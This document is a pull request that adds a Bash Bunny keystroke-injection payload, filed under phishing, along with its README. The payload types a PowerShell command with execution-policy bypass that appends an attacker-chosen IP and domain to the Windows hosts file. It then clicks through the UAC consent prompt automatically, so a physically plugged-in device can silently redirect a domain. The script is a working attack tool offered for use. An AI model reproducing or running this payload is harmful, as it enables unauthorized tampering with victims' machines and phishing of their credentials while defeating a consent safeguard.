### PR TITLE
Windows Powershell Local DNS Poisoning payload

### DIFF
--- a/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md
+++ b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md
@@ -1,0 +1,19 @@
+# Hosts file DNS poisoning using Powershell
+
+## Description
+Redirects a given domain name to the target IP address. Uses the run prompt and Powershell to edit the hosts file, should work with any Windows version with those features but only tested on Windows 10.
+Change the variables under "options" in the setup stage before executing.
+
+## Options
+| Variable        | Description                              |
+|-----------------|------------------------------------------|
+| poisoned_domain | This domain will point to the target IP  |
+| target_ip       | The IP that the domain should resolve to |
+
+## LED States
+| State  | Color               | Description                             |
+|--------|---------------------|-----------------------------------------|
+| SETUP  | Magenta solid       | Set attackmode and initialize variables |
+| STAGE1 | Yellow single blink | Modifying the hosts file                |
+| STAGE2 | Yellow double blink | Bypassing UAC                           |
+| FINISH | Green solid         | Script completed                        |

--- a/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md
+++ b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md
@@ -2,6 +2,7 @@
 
 ## Description
 Redirects a given domain name to the target IP address. Uses the run prompt and Powershell to edit the hosts file, should work with any Windows version with those features but only tested on Windows 10.
+
 Change the variables under "options" in the setup stage before executing.
 
 ## Options

--- a/payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt
+++ b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt
@@ -1,0 +1,59 @@
+#!/bin/bash
+##########################################################################
+# Title:        Powershell Local DNS Poisoning
+# Description:  Edits the hosts file to redirect an IP to a domain
+# Author:       SammyTheBEAST
+# Version:      1
+# Category:     Phishing
+# Target:       Windows 10
+# Attackmode:   HID
+#
+# Variables:
+#     poisoned_domain:  This domain will point to the target IP
+#     target_ip:        The IP that the domain should resolve to
+# LED States:
+#     SETUP  (Magenta solid):        Set attackmode and initialize variables
+#     STAGE1 (Yellow single blink):  Modifying the hosts file
+#     STAGE2 (Yellow double blink):  Bypassing UAC
+#     FINISH (Green solid):          Script completed
+##########################################################################
+
+LED SETUP
+ATTACKMODE HID
+SET_LANGUAGE us
+
+# Options
+poisoned_domain="POISONED_DOMAIN"
+target_ip="TARGET_IP"
+
+
+##### Edit the hosts file #####
+LED STAGE1
+# Open the run prompt
+Q GUI r
+Q DELAY 500
+# Append a string to the hosts file
+Q STRING "powershell -noprofile -exec bypass -c \"Add-Content -Path \$Env:SystemRoot\System32\drivers\etc\hosts -Value '$target_ip $poisoned_domain'\""
+Q DELAY 50
+# Run as administrator
+Q CTRL-SHIFT ENTER
+Q DELAY 500
+
+
+##### Bypass UAC #####
+LED STAGE2
+# Attempt to bypass if window is already focused
+Q LEFTARROW
+Q DELAY 50
+Q ENTER
+# If the UAC window was not focused:
+# Run a powershell command to focus the window
+RUN WIN 'powershell -noprofile -exec bypass -c "(New-Object -ComObject WScript.Shell).AppActivate((get-process consent).MainWindowTitle)"'
+Q DELAY 500
+# Bypass once UAC window is focused
+Q LEFTARROW
+Q DELAY 50
+Q ENTER
+
+
+LED FINISH


### PR DESCRIPTION
Appends a domain and IP to the hosts file to poison the local DNS. Similar to github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/Local_DNS_Poisoning but uses powershell commands rather than cmd. On Windows 10 the old payload does not work as the commands used are deprecated (set, %variable%). There are also multiple spelling errors in the original payload, no comments are present, and it is not exactly clear what the user must change to use the payload.